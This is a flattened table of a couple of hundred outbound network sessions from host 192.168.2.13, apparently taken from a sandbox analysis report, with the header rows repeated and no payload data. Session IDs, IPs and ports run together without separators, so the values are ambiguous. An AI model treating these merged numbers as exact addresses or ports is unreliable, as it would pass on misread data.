                                        19042192.168.2.1359398184.186.173.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19043192.168.2.134750073.49.69.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19044192.168.2.1344240125.112.205.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19045192.168.2.1348368113.113.96.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19046192.168.2.1341884138.73.47.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19047192.168.2.1347778173.159.165.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19048192.168.2.135394844.198.77.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19049192.168.2.133524278.31.48.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19050192.168.2.1356204149.211.27.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19051192.168.2.1350844150.64.138.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19052192.168.2.13566209.169.200.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19053192.168.2.135176694.155.217.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19054192.168.2.1332796153.68.94.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19055192.168.2.1354388167.137.103.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19056192.168.2.1350524204.176.50.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19057192.168.2.134054088.50.224.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19058192.168.2.1334780209.105.156.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19059192.168.2.1344076117.251.225.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19060192.168.2.134898824.242.48.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19061192.168.2.1337642120.130.110.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19062192.168.2.1338852192.246.65.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19063192.168.2.133987672.49.223.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19064192.168.2.1333686142.124.214.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19065192.168.2.1357814120.133.115.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19066192.168.2.1348980154.147.117.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19067192.168.2.1336408170.6.68.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19068192.168.2.134632873.205.120.2008080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19069192.168.2.1342686120.53.220.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19070192.168.2.135354446.232.98.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19071192.168.2.136041466.119.20.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19072192.168.2.1356726126.170.129.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19073192.168.2.133636868.81.235.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19074192.168.2.1343588167.166.32.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19075192.168.2.1348816174.107.225.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19076192.168.2.1360886219.59.15.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19077192.168.2.134596672.253.201.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19078192.168.2.135866887.135.25.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19079192.168.2.1347060126.226.183.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19080192.168.2.134445261.79.180.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19081192.168.2.1334278170.239.186.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19082192.168.2.135872649.120.225.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19083192.168.2.1339096146.164.62.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19084192.168.2.134538297.234.127.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19085192.168.2.133279291.155.70.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19086192.168.2.135448457.92.250.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19087192.168.2.134019297.97.127.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19088192.168.2.1346128125.46.237.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19089192.168.2.133290236.48.204.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19090192.168.2.1356718140.169.84.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19091192.168.2.134756046.100.84.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19092192.168.2.135053284.246.174.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19093192.168.2.1340142148.201.18.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19094192.168.2.1355206162.15.218.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19095192.168.2.1344142120.81.184.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19096192.168.2.1335156197.91.146.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19097192.168.2.134080238.126.17.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19098192.168.2.1353460109.94.10.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19099192.168.2.1339928132.144.223.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19100192.168.2.134152491.48.37.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19101192.168.2.1353832153.240.57.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19102192.168.2.135794092.200.86.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19103192.168.2.135968864.0.61.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19104192.168.2.135439872.49.97.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19105192.168.2.1357210192.68.71.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19106192.168.2.136032827.113.70.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19107192.168.2.1353062223.9.16.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19108192.168.2.135954891.13.194.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19109192.168.2.133417070.83.111.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19110192.168.2.1357544199.128.233.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19111192.168.2.1343146176.248.180.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19112192.168.2.135751279.235.208.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19113192.168.2.1353724136.231.38.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19114192.168.2.1357058195.41.129.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19115192.168.2.1356592136.225.232.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19116192.168.2.1335906192.110.220.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19117192.168.2.1354280180.44.149.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19118192.168.2.1359242102.94.179.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19119192.168.2.1348772194.2.222.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19120192.168.2.1341886153.85.68.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19121192.168.2.1342636129.165.154.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19122192.168.2.135175658.214.155.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19123192.168.2.1345034128.0.248.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19124192.168.2.135149645.37.104.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19125192.168.2.135003488.189.165.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19126192.168.2.133573497.63.244.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19127192.168.2.1338420101.50.30.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19128192.168.2.1334974138.8.11.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19129192.168.2.1337112203.152.126.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19130192.168.2.1351438118.243.9.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19131192.168.2.134314875.162.223.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19132192.168.2.133671834.119.226.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19133192.168.2.13508969.31.19.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19134192.168.2.1350300150.139.153.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19135192.168.2.1356082112.125.185.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19136192.168.2.133502853.215.143.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19137192.168.2.135285671.119.139.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19138192.168.2.1346548209.115.150.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19139192.168.2.1336878192.82.242.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19140192.168.2.1345806109.114.159.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19141192.168.2.1339412145.100.127.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19142192.168.2.1343050207.221.63.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19143192.168.2.1342116217.109.35.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19144192.168.2.135405260.99.219.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19145192.168.2.1338480217.100.105.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19146192.168.2.135937463.146.62.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19147192.168.2.135058279.122.215.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19148192.168.2.135407050.52.255.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19149192.168.2.134109250.196.138.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19150192.168.2.1344674158.233.217.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19151192.168.2.1341138155.22.147.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19152192.168.2.1336074153.134.177.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19153192.168.2.1350994169.172.187.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19154192.168.2.1352402192.139.202.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19155192.168.2.133872697.229.60.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19156192.168.2.134847262.106.0.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19157192.168.2.1352164107.244.24.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19158192.168.2.13388588.164.178.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19159192.168.2.134001018.121.143.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19160192.168.2.1340602198.6.172.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19161192.168.2.135071013.85.187.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19162192.168.2.1348188163.65.28.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19163192.168.2.1351206213.164.166.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19164192.168.2.135819688.212.132.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19165192.168.2.1333116165.8.112.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19166192.168.2.1346188173.93.126.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19167192.168.2.134061462.117.52.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19168192.168.2.1345670219.63.131.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19169192.168.2.135773095.199.161.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19170192.168.2.134151281.40.82.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19171192.168.2.1345682219.106.194.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19172192.168.2.133420883.141.81.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19173192.168.2.1350700148.178.139.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19174192.168.2.1333110110.110.99.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19175192.168.2.136081671.123.97.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19176192.168.2.135455471.53.74.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19177192.168.2.134947479.73.62.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19178192.168.2.1358880201.5.16.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19179192.168.2.135975870.91.109.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19180192.168.2.133384643.82.101.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19181192.168.2.1356342164.208.67.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19182192.168.2.135711473.206.213.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19183192.168.2.13603069.214.106.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19184192.168.2.134467053.13.64.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19185192.168.2.1348716140.6.233.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19186192.168.2.1358168184.45.39.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19187192.168.2.1346420197.209.177.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19188192.168.2.1347108163.63.172.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19189192.168.2.1351578103.42.173.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19190192.168.2.133876870.107.60.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19191192.168.2.1349212157.98.126.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19192192.168.2.133621625.83.241.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19193192.168.2.134793653.123.20.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19194192.168.2.1343582130.90.140.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19195192.168.2.135804674.55.112.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19196192.168.2.1358904130.130.77.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19197192.168.2.1346800118.123.104.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19198192.168.2.135047818.186.185.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19199192.168.2.1360584180.138.231.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19200192.168.2.1346406132.199.209.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19201192.168.2.1356392166.6.97.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19202192.168.2.1340392198.22.111.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19203192.168.2.135520486.224.185.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19204192.168.2.1359614126.143.137.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19205192.168.2.1333386140.175.177.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19206192.168.2.134221897.174.78.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19207192.168.2.1353496198.228.7.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19208192.168.2.134979857.154.75.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19209192.168.2.135641251.251.189.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19210192.168.2.134975654.66.118.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19211192.168.2.134451071.73.109.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19212192.168.2.1351330100.246.207.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19213192.168.2.133535077.251.35.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19214192.168.2.135868295.93.111.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19215192.168.2.133566893.63.170.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19216192.168.2.1336848110.173.80.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19217192.168.2.13337569.225.216.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19218192.168.2.1337688212.204.174.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19219192.168.2.1351744109.255.88.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19220192.168.2.1355868171.92.99.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19221192.168.2.134931897.64.177.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19222192.168.2.1348324112.93.209.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19223192.168.2.1348428129.109.112.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19224192.168.2.1356500223.238.74.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19225192.168.2.135597873.47.188.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19226192.168.2.134494043.51.84.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19227192.168.2.134288490.151.187.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19228192.168.2.1358850206.3.78.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19229192.168.2.1355528107.115.122.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19230192.168.2.1341556105.91.101.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19231192.168.2.1358498181.119.212.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19232192.168.2.1340792205.249.38.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19233192.168.2.133416065.199.243.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19234192.168.2.1338892102.248.38.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19235192.168.2.134673076.9.42.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19236192.168.2.135924469.193.7.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19237192.168.2.1347864201.114.209.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19238192.168.2.1340960174.241.147.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19239192.168.2.1351524151.186.211.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19240192.168.2.133696063.10.38.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19241192.168.2.1358746208.221.173.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19242192.168.2.13413521.86.127.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19243192.168.2.135036080.197.75.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19244192.168.2.1353746154.119.176.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19245192.168.2.1341794149.77.79.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19246192.168.2.135194465.61.196.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19247192.168.2.135447086.165.99.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19248192.168.2.1338078195.117.115.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19249192.168.2.135031019.57.52.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19250192.168.2.1335406128.121.104.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19251192.168.2.1335844117.81.219.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19252192.168.2.1358884178.30.232.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19253192.168.2.134288057.42.152.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19254192.168.2.1349268130.176.234.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19255192.168.2.1347602167.196.172.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19256192.168.2.13592645.4.167.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19257192.168.2.135661690.225.85.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19258192.168.2.136032674.45.117.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19259192.168.2.1336230134.234.114.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19260192.168.2.133769643.197.57.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19261192.168.2.1355004116.191.208.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19262192.168.2.1339430179.190.48.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19263192.168.2.1344880207.116.86.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
